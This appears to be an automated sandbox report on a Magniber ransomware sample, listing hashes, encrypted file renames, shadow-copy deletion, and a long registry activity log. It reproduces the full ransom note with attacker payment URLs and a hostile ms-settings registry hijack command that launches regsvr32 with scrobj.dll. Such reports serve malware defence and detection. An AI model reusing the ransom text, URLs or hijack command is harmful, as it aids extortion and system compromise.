magniber | 4889479cc52b989f745d78a483c62fabaa70e7f078a82a5656c8a454e599bac5

Analysis

max time kernel
146s
max time network
126s
platform
windows10_x64
resource
win10-en-20211104
submitted
09-11-2021 06:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

xnfipyy.inf.dll
Size

38KB
MD5

18ff6706dac4cda1c85afa02495f4149
SHA1

a9b70524165713bcb147ca22c95475c091232904
SHA256

4889479cc52b989f745d78a483c62fabaa70e7f078a82a5656c8a454e599bac5
SHA512

d3c2ae6497eeaa323544e72a39d3dfe95a5701054944cf09307cfc2b6e70011ea93035e1523739af3a8b39022b7fe3ca7ebc95493731b4184132f2ae783582d9

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://62c4684026f46e107cdujyxylz.w3disbrllt7cfknxuutwevchixw5vbyc4ujvg5cz3u57nryezwqgwnad.onion/dujyxylz Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://62c4684026f46e107cdujyxylz.wonsre.space/dujyxylz http://62c4684026f46e107cdujyxylz.wheelgo.sbs/dujyxylz http://62c4684026f46e107cdujyxylz.fitsbus.uno/dujyxylz http://62c4684026f46e107cdujyxylz.amlack.quest/dujyxylz Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://62c4684026f46e107cdujyxylz.w3disbrllt7cfknxuutwevchixw5vbyc4ujvg5cz3u57nryezwqgwnad.onion/dujyxylz

http://62c4684026f46e107cdujyxylz.wonsre.space/dujyxylz

http://62c4684026f46e107cdujyxylz.wheelgo.sbs/dujyxylz

http://62c4684026f46e107cdujyxylz.fitsbus.uno/dujyxylz

http://62c4684026f46e107cdujyxylz.amlack.quest/dujyxylz

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	3816	cmd.exe	81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	3816	cmd.exe	81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2756	3816	vssadmin.exe	81

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

rundll32.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\InvokeSelect.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\InvokeSelect.tiff => C:\Users\Admin\Pictures\InvokeSelect.tiff.dujyxylz	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\ResolveExport.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ResolveExport.tiff => C:\Users\Admin\Pictures\ResolveExport.tiff.dujyxylz	rundll32.exe
File renamed	C:\Users\Admin\Pictures\WatchGrant.png => C:\Users\Admin\Pictures\WatchGrant.png.dujyxylz	rundll32.exe
File renamed	C:\Users\Admin\Pictures\JoinStart.raw => C:\Users\Admin\Pictures\JoinStart.raw.dujyxylz	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ResetConnect.raw => C:\Users\Admin\Pictures\ResetConnect.raw.dujyxylz	rundll32.exe
File renamed	C:\Users\Admin\Pictures\SplitComplete.raw => C:\Users\Admin\Pictures\SplitComplete.raw.dujyxylz	rundll32.exe
File renamed	C:\Users\Admin\Pictures\UnblockRepair.crw => C:\Users\Admin\Pictures\UnblockRepair.crw.dujyxylz	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 64 IoCs

Processes:

rundll32.exe

description	pid	Process
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe
PID 3996 set thread context of 0	3996	rundll32.exe

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
2756	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheLi = "1"
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cache = "MicrosoftEdge_iecompatua:"
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "265"
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "006"
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "0"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList
Key deleted	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{3B9748D4-FCA6-4546-9DCB-A2ABE0744E5A} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cache = "265"
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Cac = "1"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Packa = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000068300b0c8aad18661a8296645d205a53a8f1c757be7904ea87edacdf356ec9183158a28131563ca33228f01f244e1de39b0737119356636e7df69074f8748f548ce4f1b1d9cf0ada3c5bcdc07ba0b43f057ecc614a104fa7a5ff	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CachePr = "MicrosoftEdge_iecompat:"
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheRepair = "0"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CachePa = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache"
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5db7a90232d5d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a36c5d0232d5d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge_iecompatua:"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "1"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "microsoft.microsoftedge_8wekyb3d8bbwe/006"
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge_iecompat:"
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000618cab49a1bd9059fbe5b29e1a39c75a71db49866520f39d96cd131cfa514c57c82003366aa02d95855d7140614a2a386e28a9299c13ce2b8c4d	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cache = "0"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException\Cac = "MicrosoftEdge_DNTException:"
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cache = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
2140	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
3996	rundll32.exe
3996	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
2056

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

rundll32.exeMicrosoftEdgeCP.exe

pid	Process
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
2960	MicrosoftEdgeCP.exe
2960	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exeWMIC.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
Token: SeShutdownPrivilege	2056
Token: SeCreatePagefilePrivilege	2056
